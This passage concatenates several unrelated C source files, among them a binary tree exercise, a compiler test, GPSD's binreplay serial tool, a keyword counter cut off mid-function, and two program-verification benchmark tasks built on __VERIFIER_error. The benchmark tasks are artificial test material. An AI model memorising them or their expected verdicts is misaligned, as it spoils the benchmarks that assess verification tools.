29486, 29923, 24321, 29986, 29987, 30059, 30011, 30070, 24403, 30090, 30067, 30095, 30094, 30194, 40635, 30217, 30290, 30332, 30330, 30344, 24112, 30403, 26479, 30428, 30423, 30433, 23613, 30526, 34886, 30862, 30741, 30970, 40644, 31014, 37489, 31061, 31192, 31142, 24481, 31146, 31109, 31150, 31036, 33836, 19975, 31237, 31246, 31281, 31216, 31291, 31282, 31319, 31298, 31337, 31311, 31383, 31379, 31434, 31363, 31505, 21682, 31929, 31883, 32067, 24358, 32085, 32118, 32114, 31992, 32147, 32076, 32160, 32209, 32227, 32257, 32291, 30476, 32306, 32047, 32317, 32207, 32305, 32294, 32325, 32368, 32361, 32260, 32362, 32117, 32380, 32153, 32396, 32154, 32406, 32330, 32570, 27424, 32573, 37474, 32592, 32566, 32882, 22768, 32893, 32884, 32901, 31899, 33059, 21767, 33067, 33073, 33139, 33050, 33126, 33075, 33213, 32966, 33247, 33235, 33274, 21488, 33287, 19982, 33289, 25369, 33290, 26087, 33293, 33294, 33616, 34214, 33686, 33550, 33674, 33624, 33879, 30528, 34255, 34101, 34224, 34219, 34269, 33464, 34277, 34220, 34389, 20966, 34395, 34394, 34399, 21495, 34722, 34509, 34802, 34411, 34870, 34453, 34875, 34542, 35037, 35013, 35041, 35023, 35258, 35226, 35261, 35239, 35264, 35251, 35320, 35302, 35387, 27880, 35498, 35500, 35575, 39080, 35616, 35617, 35657, 35388, 35695, 35379, 35709, 35465, 35712, 35501, 35722, 22793, 35731, 35698, 35903, 28179, 35920, 35914, 35947, 20104, 35987, 29483, 36019, 24336, 36067, 22770, 36084, 38972, 36106, 36059, 36368, 36341, 36404, 36362, 36629, 36605, 36681, 36578, 36776, 24321, 36781, 36766, 36783, 24321, 36852, 22238, 36958, 36883, 36978, 36933, 37002, 36794, 37129, 37111, 37168, 38563, 37257, 37204, 37259, 37218, 37291, 21307, 37312, 37304, 37323, 37320, 37328, 21400, 37610, 33303, 37555, 37613, 37666, 37549, 37636, 37682, 37706, 37676, 37780, 28342, 37941, 37444, 37956, 37619, 37970, 37969, 38290, 38289, 38321, 38322, 38364, 38306, 38442, 22338, 38519, 38501, 38568, 38543, 38570, 38522, 38577, 38560, 38584, 38583, 38620, 38609, 38617, 21452, 38622, 40335, 38712, 35207, 38728, 38666, 38748, 38745, 38991, 38996, 39023, 38997, 39089, 21488, 39192, 20313, 39345, 39364, 39479, 39442, 39493, 39366, 39515, 39365, 39511, 39443, 39635, 39620, 39636, 20307, 39662, 39658, 39717, 38360, 40573, 22633, 40613, 40614, 40643, 40644, 40655, 31896, 40657, 40658, 40664, 40665, 40670, 28857, 40680, 20826, 40778, 25993, 40779, 25998, 40786, 27503, 40801, 40802, 40845, 31452 };
the_stack_data/159515667.c
/* Copyright (c) 1985-2012, B-Core (UK) Ltd All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ void INI_Bit_TYPE() { }
the_stack_data/919656.c
#include <stdio.h> #include <stdlib.h> typedef struct node { int key; int value; struct node *left; struct node *right; } node; typedef node* list; int init(list *root){ *root = NULL; return 1; } list getFreeNode(int value, int key) { list tmp = (list) malloc(sizeof(node)); tmp->left = NULL; tmp->right = NULL; tmp->value = value; tmp->key = key; return tmp; } void insert(list *root, int key, int value) { node *tmp = NULL; if (*root == NULL) { *root = getFreeNode(value, key); return; } tmp = *root; while (tmp) { if (key > tmp->key) { if (tmp->right) { tmp = tmp->right; continue; } else { tmp->right = getFreeNode(value, key); return; } } else if (key < tmp->key) { if (tmp->left) { tmp = tmp->left; continue; } else { tmp->left = getFreeNode(value, key); return; } } else exit(2); } } list search(list *root, int key){ int levl=-1; int znach=0; list tmp = NULL; tmp = *root; while(tmp){ if(key < tmp->key){ if(tmp->left!=NULL){ tmp = tmp->left; levl++; continue; } if(tmp->left==NULL && key<tmp->key) { printf("-1\n"); return tmp; } } if(key > tmp->key){ if(tmp->right!=NULL){ tmp = tmp->right; levl++; continue; } if(tmp->right==NULL && key>tmp->key) { printf("-1\n"); return tmp; } } if(key == tmp->key){ znach=(tmp)->value; printf(" %d %d\n",levl+1,znach); return tmp; } } return NULL; } int main() { list root; init(&root); int n, a, b, e, f, g; scanf("%d", &n); if (n > 0) { for(int i=0;i<n;i++){ scanf("%d%d", &a, &b); insert(&root,a,b); } } printf("\n"); scanf("%d%d%d",&e, &f, &g); search(&root,e); search(&root,f); search(&root,g); printf("\n"); return 0; }
the_stack_data/104577.c
// RUN: %ucc -S -o- %s | grep 'cvtss2sd' // RUN: %ucc -S -o- %s | grep 'cvtsd2ss' // RUN: %ucc -c %s // weakish test.. f_f(float f) { void f_d(double); f_d(f); } void f_d(double d) { f_f(d); } main() { float f; double d; f = 1; d = f; // sstosd f = d; // sdtoss }
the_stack_data/123231.c
/* This file is Copyright (c)2010 by the GPSD project * BSD terms apply: see the file COPYING in the distribution root for details. */ #include <sys/types.h> #include <sys/mman.h> #include <sys/stat.h> #include <err.h> #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <termios.h> #include <unistd.h> #include <string.h> #ifndef __GLIBC__ #include <util.h> #else #include <stdlib.h> #include <pty.h> #endif #define WRLEN 64 void spinner(int); void usage(void); int main( int argc, char **argv){ struct stat sb; struct termios term; char *buf, tn[32]; int ifd, ofd, sfd; int dflag = 0, c, sleeptime, len, rate = 0, speed = 0; while((c = getopt(argc, argv, "d:r:s:")) != -1) { switch(c){ case 'd': dflag = 1; strncpy(tn, optarg, sizeof(tn)-1); break; case 'r': rate = atoi(optarg); switch (rate) { case 230400: case 115200: case 57600: case 38400: case 28800: case 19200: case 14400: case 9600: case 4800: break; default: fprintf(stderr, "invalid data rate: %d\n", rate); return 1; } break; case 's': speed = atoi(optarg); switch (speed) { case 230400: case 115200: case 57600: case 38400: case 28800: case 19200: case 14400: case 9600: case 4800: break; default: fprintf(stderr, "invalid port speed: %d\n", speed); return 1; } break; default: usage(); } } argc -= optind; argv += optind; if (argc != 1) usage(); if (rate > speed){ printf("data rate cannot be higher than port speed.\n"); return 1; } if (0 == rate && 0 != speed) rate = speed; if (0 == rate && 0 == speed) rate = speed = 4800; printf("opening %s\n", argv[0]); if ((ifd = open(argv[0], O_RDONLY, 0444)) == -1) err(1, "open"); if (fstat(ifd, &sb) == -1) err(1, "fstat"); if ((buf = mmap(0, sb.st_size, PROT_READ, MAP_FILE | MAP_PRIVATE, ifd, 0)) == MAP_FAILED) err(1, "mmap"); if (dflag){ if ((ofd = open(tn, O_RDWR|O_NOCTTY, 0644)) == -1) err(1, "open"); tcgetattr(ofd, &term); cfmakeraw(&term); cfsetispeed(&term, speed); cfsetospeed(&term, speed); #if 0 term.c_cflag &= ~(PARENB | PARODD | CRTSCTS); term.c_cflag |= CREAD | CLOCAL; term.c_iflag = term.c_oflag = term.c_lflag = (tcflag_t) 0; #endif tcflush(ofd, TCIOFLUSH); tcsetattr(ofd, TCSANOW, &term); tcflush(ofd, TCIOFLUSH); } else { cfmakeraw(&term); cfsetospeed(&term, speed); cfsetispeed(&term, speed); if (openpty(&ofd, &sfd, tn, &term, NULL) == -1) err(1, "openpty"); tcsetattr(ofd, TCSANOW, &term); tcsetattr(sfd, TCSANOW, &term); } sleeptime = 1000000 / (speed / (WRLEN * 10)); printf("configured %s for %dbps - write delay %dus\n", tn, speed, sleeptime); for(len = 0; len < sb.st_size; len += WRLEN ){ write(ofd, buf+len, WRLEN ); // tcdrain(ofd); if (0 == dflag){ tcflush(ofd, TCIFLUSH); // tcdrain(sfd); tcflush(sfd, TCIFLUSH); } spinner( len ); usleep(sleeptime); } munmap(buf, sb.st_size); close(ifd); close(ofd); fprintf(stderr, "\010\010\010\010\010\010\010\010\010\010\010\010\n"); return 0; } void spinner(int n){ char *s = "|/-\\"; if (n % (WRLEN * 4)) return; n /= (WRLEN * 4); fprintf(stderr, "\010\010\010\010\010\010\010\010\010\010\010\010\010"); fprintf(stderr, "%c %d", s[n%4], n); fflush(stderr); } void usage(void){ fprintf(stderr, "usage: binreplay [-d <device>] [-r <data_rate>] [-s <port_speed>] <file>\n"); exit(1); }
the_stack_data/165767821.c
extern void __VERIFIER_error() __attribute__ ((__noreturn__)); /* Generated by CIL v. 1.3.6 */ /* print_CIL_Input is true */ void error(void) { { ERROR: __VERIFIER_error(); return; } } int m_pc = 0; int t1_pc = 0; int m_st ; int t1_st ; int m_i ; int t1_i ; int M_E = 2; int T1_E = 2; int E_M = 2; int E_1 = 2; int is_master_triggered(void) ; int is_transmit1_triggered(void) ; void immediate_notify(void) ; int token ; int __VERIFIER_nondet_int() ; int local ; void master(void) { int tmp_var ; { if (m_pc == 0) { goto M_ENTRY; } else { if (m_pc == 1) { goto M_WAIT; } else { } } M_ENTRY: ; { while (1) { while_0_continue: /* CIL Label */ ; { token = __VERIFIER_nondet_int(); local = token; E_1 = 1; immediate_notify(); E_1 = 2; m_pc = 1; m_st = 2; } goto return_label; M_WAIT: ; if (token != local + 1) { { error(); } } else { if(tmp_var <= 5){ if(tmp_var >= 5){ } } if(tmp_var <= 5){ if(tmp_var >= 5){ if(tmp_var == 5){ error(); } } } } } while_0_break: /* CIL Label */ ; } return_label: /* CIL Label */ return; } } void transmit1(void) { { if (t1_pc == 0) { goto T1_ENTRY; } else { if (t1_pc == 1) { goto T1_WAIT; } else { } } T1_ENTRY: ; { while (1) { while_1_continue: /* CIL Label */ ; t1_pc = 1; t1_st = 2; goto return_label; T1_WAIT: { token += 1; E_M = 1; immediate_notify(); E_M = 2; } } while_1_break: /* CIL Label */ ; } return_label: /* CIL Label */ return; } } int is_master_triggered(void) { int __retres1 ; { if (m_pc == 1) { if (E_M == 1) { __retres1 = 1; goto return_label; } else { } } else { } __retres1 = 0; return_label: /* CIL Label */ return (__retres1); } } int is_transmit1_triggered(void) { int __retres1 ; { if (t1_pc == 1) { if (E_1 == 1) { __retres1 = 1; goto return_label; } else { } } else { } __retres1 = 0; return_label: /* CIL Label */ return (__retres1); } } void update_channels(void) { { return; } } void init_threads(void) { { if (m_i == 1) { m_st = 0; } else { m_st = 2; } if (t1_i == 1) { t1_st = 0; } else { t1_st = 2; } return; } } int exists_runnable_thread(void) { int __retres1 ; { if (m_st == 0) { __retres1 = 1; goto return_label; } else { if (t1_st == 0) { __retres1 = 1; goto return_label; } else { } } __retres1 = 0; return_label: /* CIL Label */ return (__retres1); } } void eval(void) { int tmp ; { { while (1) { while_2_continue: /* CIL Label */ ; { tmp = exists_runnable_thread(); } if (tmp) { } else { goto while_2_break; } if (m_st == 0) { int tmp_ndt_1; tmp_ndt_1 = __VERIFIER_nondet_int(); if (tmp_ndt_1) { { m_st = 1; master(); } } else { } } else { } if (t1_st == 0) { int tmp_ndt_2; tmp_ndt_2 = __VERIFIER_nondet_int(); if (tmp_ndt_2) { { t1_st = 1; transmit1(); } } else { } } else { } } while_2_break: /* CIL Label */ ; } return; } } void fire_delta_events(void) { { if (M_E == 0) { M_E = 1; } else { } if (T1_E == 0) { T1_E = 1; } else { } if (E_M == 0) { E_M = 1; } else { } if (E_1 == 0) { E_1 = 1; } else { } return; } } void reset_delta_events(void) { { if (M_E == 1) { M_E = 2; } else { } if (T1_E == 1) { T1_E = 2; } else { } if (E_M == 1) { E_M = 2; } else { } if (E_1 == 1) { E_1 = 2; } else { } return; } } void activate_threads(void) { int tmp ; int tmp___0 ; { { tmp = is_master_triggered(); } if (tmp) { m_st = 0; } else { } { tmp___0 = is_transmit1_triggered(); } if (tmp___0) { t1_st = 0; } else { } return; } } void immediate_notify(void) { { { activate_threads(); } return; } } void fire_time_events(void) { { M_E = 1; return; } } void reset_time_events(void) { { if (M_E == 1) { M_E = 2; } else { } if (T1_E == 1) { T1_E = 2; } else { } if (E_M == 1) { E_M = 2; } else { } if (E_1 == 1) { E_1 = 2; } else { } return; } } void init_model(void) { { m_i = 1; t1_i = 1; return; } } int stop_simulation(void) { int tmp ; int __retres2 ; { { tmp = exists_runnable_thread(); } if (tmp) { __retres2 = 0; goto return_label; } else { } __retres2 = 1; return_label: /* CIL Label */ return (__retres2); } } void start_simulation(void) { int kernel_st ; int tmp ; int tmp___0 ; { { kernel_st = 0; update_channels(); init_threads(); fire_delta_events(); activate_threads(); reset_delta_events(); } { while (1) { while_3_continue: /* CIL Label */ ; { kernel_st = 1; eval(); } { kernel_st = 2; update_channels(); } { kernel_st = 3; fire_delta_events(); activate_threads(); reset_delta_events(); } { tmp = exists_runnable_thread(); } if (tmp == 0) { { kernel_st = 4; fire_time_events(); activate_threads(); reset_time_events(); } } else { } { tmp___0 = stop_simulation(); } if (tmp___0) { goto while_3_break; } else { } } while_3_break: /* CIL Label */ ; } return; } } int main(void) { int __retres1 ; { { init_model(); start_simulation(); } __retres1 = 0; return (__retres1); } }
the_stack_data/231393767.c
extern float __VERIFIER_nondet_float(void); extern int __VERIFIER_nondet_int(void); typedef enum {false, true} bool; bool __VERIFIER_nondet_bool(void) { return __VERIFIER_nondet_int() != 0; } int main() { bool _EL_U_825, _x__EL_U_825; int min_num, _x_min_num; int num7, _x_num7; bool _EL_U_827, _x__EL_U_827; int num1, _x_num1; int num0, _x_num0; bool _EL_U_829, _x__EL_U_829; bool p0_l1, _x_p0_l1; bool p0_l0, _x_p0_l0; int num2, _x_num2; int num3, _x_num3; int num4, _x_num4; int num5, _x_num5; int num6, _x_num6; bool p1_l1, _x_p1_l1; bool p1_l0, _x_p1_l0; bool p2_l1, _x_p2_l1; bool p2_l0, _x_p2_l0; bool p3_l1, _x_p3_l1; bool p3_l0, _x_p3_l0; bool p4_l1, _x_p4_l1; bool p4_l0, _x_p4_l0; int max_num, _x_max_num; bool p5_l1, _x_p5_l1; bool p5_l0, _x_p5_l0; bool p6_l1, _x_p6_l1; bool p6_l0, _x_p6_l0; bool run1, _x_run1; bool run0, _x_run0; bool run2, _x_run2; bool p7_l1, _x_p7_l1; bool p7_l0, _x_p7_l0; bool _J878, _x__J878; bool _J869, _x__J869; bool _J863, _x__J863; bool _J858, _x__J858; bool _J852, _x__J852; bool _EL_U_821, _x__EL_U_821; bool _EL_U_822, _x__EL_U_822; int __steps_to_fair = __VERIFIER_nondet_int(); _EL_U_825 = __VERIFIER_nondet_bool(); min_num = __VERIFIER_nondet_int(); num7 = __VERIFIER_nondet_int(); _EL_U_827 = __VERIFIER_nondet_bool(); num1 = __VERIFIER_nondet_int(); num0 = __VERIFIER_nondet_int(); _EL_U_829 = __VERIFIER_nondet_bool(); p0_l1 = __VERIFIER_nondet_bool(); p0_l0 = __VERIFIER_nondet_bool(); num2 = __VERIFIER_nondet_int(); num3 = __VERIFIER_nondet_int(); num4 = __VERIFIER_nondet_int(); num5 = __VERIFIER_nondet_int(); num6 = __VERIFIER_nondet_int(); p1_l1 = __VERIFIER_nondet_bool(); p1_l0 = __VERIFIER_nondet_bool(); p2_l1 = __VERIFIER_nondet_bool(); p2_l0 = __VERIFIER_nondet_bool(); p3_l1 = __VERIFIER_nondet_bool(); p3_l0 = __VERIFIER_nondet_bool(); p4_l1 = __VERIFIER_nondet_bool(); p4_l0 = __VERIFIER_nondet_bool(); max_num = __VERIFIER_nondet_int(); p5_l1 = __VERIFIER_nondet_bool(); p5_l0 = __VERIFIER_nondet_bool(); p6_l1 = __VERIFIER_nondet_bool(); p6_l0 = __VERIFIER_nondet_bool(); run1 = __VERIFIER_nondet_bool(); run0 = __VERIFIER_nondet_bool(); run2 = __VERIFIER_nondet_bool(); p7_l1 = __VERIFIER_nondet_bool(); p7_l0 = __VERIFIER_nondet_bool(); _J878 = __VERIFIER_nondet_bool(); _J869 = __VERIFIER_nondet_bool(); _J863 = __VERIFIER_nondet_bool(); _J858 = __VERIFIER_nondet_bool(); _J852 = __VERIFIER_nondet_bool(); _EL_U_821 = __VERIFIER_nondet_bool(); _EL_U_822 = __VERIFIER_nondet_bool(); bool __ok = ((((( !p7_l0) && ( !p7_l1)) && (((( !p7_l0) && ( !p7_l1)) || (p7_l0 && ( !p7_l1))) || ((p7_l1 && ( !p7_l0)) || (p7_l0 && p7_l1)))) && (((( !p6_l0) && ( !p6_l1)) && (((( !p6_l0) && ( !p6_l1)) || (p6_l0 && ( !p6_l1))) || ((p6_l1 && ( !p6_l0)) || (p6_l0 && p6_l1)))) && (((( !p5_l0) && ( !p5_l1)) && (((( !p5_l0) && ( !p5_l1)) || (p5_l0 && ( !p5_l1))) || ((p5_l1 && ( !p5_l0)) || (p5_l0 && p5_l1)))) && (((( !p4_l0) && ( !p4_l1)) && (((( !p4_l0) && ( !p4_l1)) || (p4_l0 && ( !p4_l1))) || ((p4_l1 && ( !p4_l0)) || (p4_l0 && p4_l1)))) && (((( !p3_l0) && ( !p3_l1)) && (((( !p3_l0) && ( !p3_l1)) || (p3_l0 && ( !p3_l1))) || ((p3_l1 && ( !p3_l0)) || (p3_l0 && p3_l1)))) && (((( !p2_l0) && ( !p2_l1)) && (((( !p2_l0) && ( !p2_l1)) || (p2_l0 && ( !p2_l1))) || ((p2_l1 && ( !p2_l0)) || (p2_l0 && p2_l1)))) && (((( !p1_l0) && ( !p1_l1)) && (((( !p1_l0) && ( !p1_l1)) || (p1_l0 && ( !p1_l1))) || ((p1_l1 && ( !p1_l0)) || (p1_l0 && p1_l1)))) && (((( !p0_l0) && ( !p0_l1)) && (((( !p0_l0) && ( !p0_l1)) || (p0_l0 && ( !p0_l1))) || ((p0_l1 && ( !p0_l0)) || (p0_l0 && p0_l1)))) && ((((((((((((((((((((((((((((num0 == 0) && (num1 == 0)) && (num2 == 0)) && (num3 == 0)) && (num4 == 0)) && (num5 == 0)) && (num6 == 0)) && (num7 == 0)) && ((run2 && (run0 && run1)) || ((run2 && (run1 && ( !run0))) || ((run2 && (run0 && ( !run1))) || ((run2 && (( !run0) && ( !run1))) || ((( !run2) && (run0 && run1)) || ((( !run2) && (run1 && ( !run0))) || ((( !run2) && (( !run0) && ( !run1))) || (( !run2) && (run0 && ( !run1))))))))))) && (num0 <= max_num)) && (num1 <= max_num)) && (num2 <= max_num)) && (num3 <= max_num)) && (num4 <= max_num)) && (num5 <= max_num)) && (num6 <= max_num)) && (num7 <= max_num)) && ((((((((num0 == max_num) || (num1 == max_num)) || (num2 == max_num)) || (num3 == max_num)) || (num4 == max_num)) || (num5 == max_num)) || (num6 == max_num)) || (num7 == max_num))) && (((((((((num0 == 0) && (num1 == 0)) && (num2 == 0)) && (num3 == 0)) && (num4 == 0)) && (num5 == 0)) && (num6 == 0)) && (num7 == 0)) == (min_num == 0))) && ((num0 <= 0) || (min_num <= num0))) && ((num1 <= 0) || (min_num <= num1))) && ((num2 <= 0) || (min_num <= num2))) && ((num3 <= 0) || (min_num <= num3))) && ((num4 <= 0) || (min_num <= num4))) && ((num5 <= 0) || (min_num <= num5))) && ((num6 <= 0) || (min_num <= num6))) && ((num7 <= 0) || (min_num <= num7))) && (((num6 == min_num) || ((num5 == min_num) || ((num4 == min_num) || ((num3 == min_num) || ((num2 == min_num) || ((num0 == min_num) || (num1 == min_num))))))) || (num7 == min_num))))))))))) && (((((( !(( !(_EL_U_829 || ( !((num0 == 0) || _EL_U_827)))) || (_EL_U_825 || ( !(((( !p0_l0) && ( !p0_l1)) || _EL_U_822) && (( !(( !p0_l0) && ( !p0_l1))) || _EL_U_821)))))) && ( !_J852)) && ( !_J858)) && ( !_J863)) && ( !_J869)) && ( !_J878))); while (__steps_to_fair >= 0 && __ok) { if (((((_J852 && _J858) && _J863) && _J869) && _J878)) { __steps_to_fair = __VERIFIER_nondet_int(); } else { __steps_to_fair--; } _x__EL_U_825 = __VERIFIER_nondet_bool(); _x_min_num = __VERIFIER_nondet_int(); _x_num7 = __VERIFIER_nondet_int(); _x__EL_U_827 = __VERIFIER_nondet_bool(); _x_num1 = __VERIFIER_nondet_int(); _x_num0 = __VERIFIER_nondet_int(); _x__EL_U_829 = __VERIFIER_nondet_bool(); _x_p0_l1 = __VERIFIER_nondet_bool(); _x_p0_l0 = __VERIFIER_nondet_bool(); _x_num2 = __VERIFIER_nondet_int(); _x_num3 = __VERIFIER_nondet_int(); _x_num4 = __VERIFIER_nondet_int(); _x_num5 = __VERIFIER_nondet_int(); _x_num6 = __VERIFIER_nondet_int(); _x_p1_l1 = __VERIFIER_nondet_bool(); _x_p1_l0 = __VERIFIER_nondet_bool(); _x_p2_l1 = __VERIFIER_nondet_bool(); _x_p2_l0 = __VERIFIER_nondet_bool(); _x_p3_l1 = __VERIFIER_nondet_bool(); _x_p3_l0 = __VERIFIER_nondet_bool(); _x_p4_l1 = __VERIFIER_nondet_bool(); _x_p4_l0 = __VERIFIER_nondet_bool(); _x_max_num = __VERIFIER_nondet_int(); _x_p5_l1 = __VERIFIER_nondet_bool(); _x_p5_l0 = __VERIFIER_nondet_bool(); _x_p6_l1 = __VERIFIER_nondet_bool(); _x_p6_l0 = __VERIFIER_nondet_bool(); _x_run1 = __VERIFIER_nondet_bool(); _x_run0 = __VERIFIER_nondet_bool(); _x_run2 = __VERIFIER_nondet_bool(); _x_p7_l1 = __VERIFIER_nondet_bool(); _x_p7_l0 = __VERIFIER_nondet_bool(); _x__J878 = __VERIFIER_nondet_bool(); _x__J869 = __VERIFIER_nondet_bool(); _x__J863 = __VERIFIER_nondet_bool(); _x__J858 = __VERIFIER_nondet_bool(); _x__J852 = __VERIFIER_nondet_bool(); _x__EL_U_821 = __VERIFIER_nondet_bool(); _x__EL_U_822 = __VERIFIER_nondet_bool(); __ok = (((((((((((( !_x_p7_l0) && ( !_x_p7_l1)) || (_x_p7_l0 && ( !_x_p7_l1))) || ((_x_p7_l1 && ( !_x_p7_l0)) || (_x_p7_l0 && _x_p7_l1))) && ((run2 && (run0 && run1)) || (((p7_l0 == _x_p7_l0) && (p7_l1 == _x_p7_l1)) && (num7 == _x_num7)))) && (((_x_p7_l0 && ( !_x_p7_l1)) && ((_x_num7 + (-1 * max_num)) == 1)) || ( !((run2 && (run0 && run1)) && (( !p7_l0) && ( !p7_l1)))))) && (((num7 == _x_num7) && ((_x_p7_l0 && ( !_x_p7_l1)) || (_x_p7_l1 && ( !_x_p7_l0)))) || ( !((run2 && (run0 && run1)) && (p7_l0 && ( !p7_l1)))))) && (( !((run2 && (run0 && run1)) && (p7_l0 && ( !p7_l1)))) || ((_x_p7_l1 && ( !_x_p7_l0)) == ((( !(num5 == min_num)) && (( !(num4 == min_num)) && (( !(num3 == min_num)) && (( !(num2 == min_num)) && (( !(num1 == min_num)) && (( !(num0 == min_num)) && (num7 <= min_num))))))) && ( !(num6 == min_num)))))) && (((num7 == _x_num7) && ((_x_p7_l1 && ( !_x_p7_l0)) || (_x_p7_l0 && _x_p7_l1))) || ( !((run2 && (run0 && run1)) && (p7_l1 && ( !p7_l0)))))) && (((( !_x_p7_l0) && ( !_x_p7_l1)) && (num7 == _x_num7)) || ( !((run2 && (run0 && run1)) && (p7_l0 && p7_l1))))) && ((((((((((( !_x_p6_l0) && ( !_x_p6_l1)) || (_x_p6_l0 && ( !_x_p6_l1))) || ((_x_p6_l1 && ( !_x_p6_l0)) || (_x_p6_l0 && _x_p6_l1))) && ((run2 && (run1 && ( !run0))) || (((p6_l0 == _x_p6_l0) && (p6_l1 == _x_p6_l1)) && (num6 == _x_num6)))) && (((_x_p6_l0 && ( !_x_p6_l1)) && ((_x_num6 + (-1 * max_num)) == 1)) || ( !((run2 && (run1 && ( !run0))) && (( !p6_l0) && ( !p6_l1)))))) && (((num6 == _x_num6) && ((_x_p6_l0 && ( !_x_p6_l1)) || (_x_p6_l1 && ( !_x_p6_l0)))) || ( !((run2 && (run1 && ( !run0))) && (p6_l0 && ( !p6_l1)))))) && (( !((run2 && (run1 && ( !run0))) && (p6_l0 && ( !p6_l1)))) || ((_x_p6_l1 && ( !_x_p6_l0)) == ((( !(num4 == min_num)) && (( !(num3 == min_num)) && (( !(num2 == min_num)) && (( !(num1 == min_num)) && (( !(num0 == min_num)) && (num6 <= min_num)))))) && ( !(num5 == min_num)))))) && (((num6 == _x_num6) && ((_x_p6_l1 && ( !_x_p6_l0)) || (_x_p6_l0 && _x_p6_l1))) || ( !((run2 && (run1 && ( !run0))) && (p6_l1 && ( !p6_l0)))))) && (((( !_x_p6_l0) && ( !_x_p6_l1)) && (num6 == _x_num6)) || ( !((run2 && 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((_x_num0 == 0) || _x__EL_U_827)) && (_EL_U_829 == (_x__EL_U_829 || ( !((_x_num0 == 0) || _x__EL_U_827)))))))) && (_x__J852 == (( !((((_J852 && _J858) && _J863) && _J869) && _J878)) && (((((_J852 && _J858) && _J863) && _J869) && _J878) || (((num0 == 0) || ( !((num0 == 0) || _EL_U_827))) || _J852))))) && (_x__J858 == (( !((((_J852 && _J858) && _J863) && _J869) && _J878)) && (((((_J852 && _J858) && _J863) && _J869) && _J878) || ((( !((num0 == 0) || _EL_U_827)) || ( !(_EL_U_829 || ( !((num0 == 0) || _EL_U_827))))) || _J858))))) && (_x__J863 == (( !((((_J852 && _J858) && _J863) && _J869) && _J878)) && (((((_J852 && _J858) && _J863) && _J869) && _J878) || (((( !p0_l0) && ( !p0_l1)) || ( !((( !p0_l0) && ( !p0_l1)) || _EL_U_822))) || _J863))))) && (_x__J869 == (( !((((_J852 && _J858) && _J863) && _J869) && _J878)) && (((((_J852 && _J858) && _J863) && _J869) && _J878) || ((( !(( !p0_l0) && ( !p0_l1))) || ( !(( !(( !p0_l0) && ( !p0_l1))) || _EL_U_821))) || _J869))))) && (_x__J878 == (( !((((_J852 && _J858) && _J863) && _J869) && _J878)) && (((((_J852 && _J858) && _J863) && _J869) && _J878) || ((( !(((( !p0_l0) && ( !p0_l1)) || _EL_U_822) && (( !(( !p0_l0) && ( !p0_l1))) || _EL_U_821))) || ( !(_EL_U_825 || ( !(((( !p0_l0) && ( !p0_l1)) || _EL_U_822) && (( !(( !p0_l0) && ( !p0_l1))) || _EL_U_821)))))) || _J878)))))); _EL_U_825 = _x__EL_U_825; min_num = _x_min_num; num7 = _x_num7; _EL_U_827 = _x__EL_U_827; num1 = _x_num1; num0 = _x_num0; _EL_U_829 = _x__EL_U_829; p0_l1 = _x_p0_l1; p0_l0 = _x_p0_l0; num2 = _x_num2; num3 = _x_num3; num4 = _x_num4; num5 = _x_num5; num6 = _x_num6; p1_l1 = _x_p1_l1; p1_l0 = _x_p1_l0; p2_l1 = _x_p2_l1; p2_l0 = _x_p2_l0; p3_l1 = _x_p3_l1; p3_l0 = _x_p3_l0; p4_l1 = _x_p4_l1; p4_l0 = _x_p4_l0; max_num = _x_max_num; p5_l1 = _x_p5_l1; p5_l0 = _x_p5_l0; p6_l1 = _x_p6_l1; p6_l0 = _x_p6_l0; run1 = _x_run1; run0 = _x_run0; run2 = _x_run2; p7_l1 = _x_p7_l1; p7_l0 = _x_p7_l0; _J878 = _x__J878; _J869 = _x__J869; _J863 = _x__J863; _J858 = _x__J858; _J852 = _x__J852; _EL_U_821 = _x__EL_U_821; _EL_U_822 = _x__EL_U_822; } }
the_stack_data/1232709.c
#include <stdio.h> #include <ctype.h> #include <string.h> #define MAXWORD 100 struct key { char *word; int count; }keytab[] = { "auto", 0, "break", 0, "case", 0, "char", 0, "const", 0, "continue", 0, "default", 0, "printf", 0, "unsigned", 0, "void", 0, "volatile", 0, "while", 0 }; #define NKEYS (sizeof keytab / sizeof (struct key)) int mgetword(char *, int); struct key *binsearch(char *, struct key *, int); /* count C keywords: pointer version */ int main(int argc, char *argv[]) { char word[MAXWORD]; struct key *p; int n; /* If you want to use an IDE which does not support EOF, replace EOF with a character like x */ while (mgetword(word, MAXWORD) != EOF) { if (isalpha(word[0])) { if ((p = binsearch(word, keytab, NKEYS)) != NULL) { p->count++; } } } for (p = keytab; p < keytab + NKEYS; p++) { if (p->count > 0) printf("%4d %s\n", p->count, p->word); } return 0; } /* binsearch: find word in tab[0] ... tab[n-1] */ struct key *binsearch(char *word, struct key *tab, int n) { int cond; struct key *low = &tab[0]; struct key *high = &tab[n]; struct key *mid; while (low < high) { mid = low + (high - low) / 2; if ((cond = strcmp(word, mid->word)) < 0) high = mid; else if (cond > 0) low = mid + 1; else return mid; } return NULL; } /* getword: get next word or character from input */ /* The requirement is to skip underscore, comments and pre-processor directive */ #define IN 1 #define OUT 0 int mgetword(char *word, int lim) { int c, d, getch(void), comment, string, directive; void ungetch(int); char *w = word; comment = string = directive = OUT; while (isspace(c = getch())) ; /* Check if inside a comment */ if (c == '/') { if ((d = getch()) == '*') { comment = IN; } else { comment = OUT; ungetch(d); } } /* Check if inside a quote */ if ( c == '\"') { string = IN; } /* Check if inside a directive */ if 